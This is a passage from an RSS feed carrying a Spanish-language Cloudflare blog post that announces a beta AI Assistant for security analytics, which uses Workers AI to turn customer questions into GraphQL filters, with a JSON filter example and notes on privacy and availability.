    <p>Con la potente plataforma de inferencia de red global de Cloudflare <a href="https://ai.cloudflare.com/">Workers AI</a>, hemos podido utilizar uno de los modelos de lenguaje de gran tamaño listos para usar que ofrece la plataforma para convertir las consultas de los clientes en filtros GraphQL. Enseñando a un modelo de IA los filtros disponibles que tenemos en nuestro conjunto de datos GraphQL de análisis de seguridad, podemos conseguir que el modelo de IA convierta una solicitud como "<i>Compare attack traffic on /api and /admin endpoints</i>" (Compara el tráfico de ataques en los puntos finales /api y /admin) en un conjunto coincidente de filtros estructurados:</p><p>A continuación, utilizando los filtros que proporciona el modelo de IA, podemos realizar solicitudes a nuestras <a href="https://developers.cloudflare.com/analytics/graphql-api/">API GraphQL</a>, recopilar los datos necesarios y representar una visualización de datos que responda a la consulta del cliente.</p>
            <pre><code>```
[
  {“name”: “Attack Traffic on /api”, “filters”: [{“key”: “clientRequestPath”, “operator”: “eq”, “value”: “/api”}, {“key”: “wafAttackScoreClass”, “operator”: “eq”, “value”: “attack”}]},
  {“name”: “Attack Traffic on /admin”, “filters”: [{“key”: “clientRequestPath”, “operator”: “eq”, “value”: “/admin”}, {“key”: “wafAttackScoreClass”, “operator”: “eq”, “value”: “attack”}]}
]
```</code></pre>
            <p>Mediante este método, podemos garantizar la privacidad de la información de los clientes y evitar exponer los datos de los análisis de seguridad al propio modelo de IA, al mismo tiempo que los usuarios humanos pueden consultar sus datos fácilmente. Esto garantiza que tus consultas nunca se utilizarán para entrenar el modelo. Puesto que Workers AI aloja una instancia local del modelo de lenguaje de gran tamaño en la propia red de Cloudflare, tus consultas y los datos resultantes nunca saldrán de la red de Cloudflare.</p>
    <div>
      <h2>Desarrollo futuro</h2>
      <a href="#desarrollo-futuro">
        
      </a>
    </div>
    <p>Estamos en las primeras etapas del desarrollo de esta funcionalidad, y tenemos previsto ampliar rápidamente las funciones de AI Assistant para los análisis de seguridad. No te sorprenda que al principio no podamos manejar algunas de tus solicitudes. En el momento de su lanzamiento, podemos admitir consultas básicas, como "show me" (muéstrame) o "compare" (compara), que se pueden representar en un gráfico de series temporales para cualquier campo que actualmente admita filtros.</p><p>Sin embargo, somos conscientes de que hay una serie de casos de uso en los que ni siquiera hemos pensado, pero nos complace lanzar la versión Beta de AI Assistant para todos los clientes de los planes Business y Enterprise para que puedan probar esta función y ver lo que pueden hacer con ella. Nos encantaría conocer tu opinión y saber más sobre lo que te parece útil y lo que te gustaría ver a continuación. Con las futuras versiones, podrás realizar preguntas como "Did I experience any attacks yesterday?" (¿Sufrí ayer algún ataque?) y utilizar la IA para generar automáticamente reglas de WAF que puedas aplicar para mitigar estos ataques.</p>
    <div>
      <h2>Disponibilidad de la versión Beta</h2>
      <a href="#disponibilidad-de-la-version-beta">
        
      </a>
    </div>
    <p>A partir de hoy, AI Assistant está disponible para algunos usuarios, y se implementará en todos los clientes de los planes Business y Enterprise a lo largo del mes de marzo. Sigue atento y pruébalo gratis. Dinos qué te parece mediante el enlace <a href="https://docs.google.com/forms/d/e/1FAIpQLSfKtXvPvKUZpjoKZa93ceTk_NAdRY4CF_PpjvFwZwa69o7i6A/viewform?entry.2073820081=Account%20security%20analytics">Comentarios</a> en la parte superior de la página de análisis de seguridad.</p><p>El precio definitivo se determinará antes de la disponibilidad general.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[Noticias de productos]]></category>
            <category><![CDATA[Analytics (ES)]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Plataforma para desarrolladores]]></category>
            <category><![CDATA[Servicios de aplicación]]></category>
            <guid isPermaLink="false">7rHa5ZDtie6BcqcvMDndWH</guid>
            <dc:creator>Jen Sells</dc:creator>
            <dc:creator>Harley Turan</dc:creator>
        </item>
    </channel>
</rss>